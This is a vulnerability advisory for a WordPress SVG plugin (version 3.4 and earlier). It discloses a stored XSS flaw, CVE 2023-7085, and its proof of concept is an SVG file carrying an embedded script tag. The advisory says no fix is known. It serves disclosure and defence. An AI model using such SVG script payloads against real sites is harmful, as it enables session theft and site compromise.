Scalable Vector Graphics (SVG) <= 3.4 – Author+ Stored XSS via SVG | CVE 2023-7085 | Plugin Vulnerabilities

Description

The plugin does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

Proof of Concept

Upload an SVG with the following code:

<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>

Access the uploaded file directly to see the XSS.

Affects Plugins

scalable-vector-graphics-svg

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

a2ec1308-75a0-49d0-9288-33c6d9ee4328

Timeline

Publicly Published

2024-02-20 (about 2 months ago)

Added

2024-02-20 (about 2 months ago)

Last Updated

2024-02-20 (about 2 months ago)

Other

Published

Title

Published

2014-08-01

Title

Foliopress WYSIWYG - Unspecified XSS

Published

2023-02-13

Title

eVision Responsive Column Layout Shortcodes <= 2.3 - Contributor+ Stored XSS

Published

2023-05-25

Title

WooCommerce Product Categories Selection Widget <= 2.0 - Reflected XSS

Published

2023-09-13

Title

PageLayer < 1.7.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

bib2html 0.9.3 - /OSBiB/create/index.php styleShortName Parameter XSS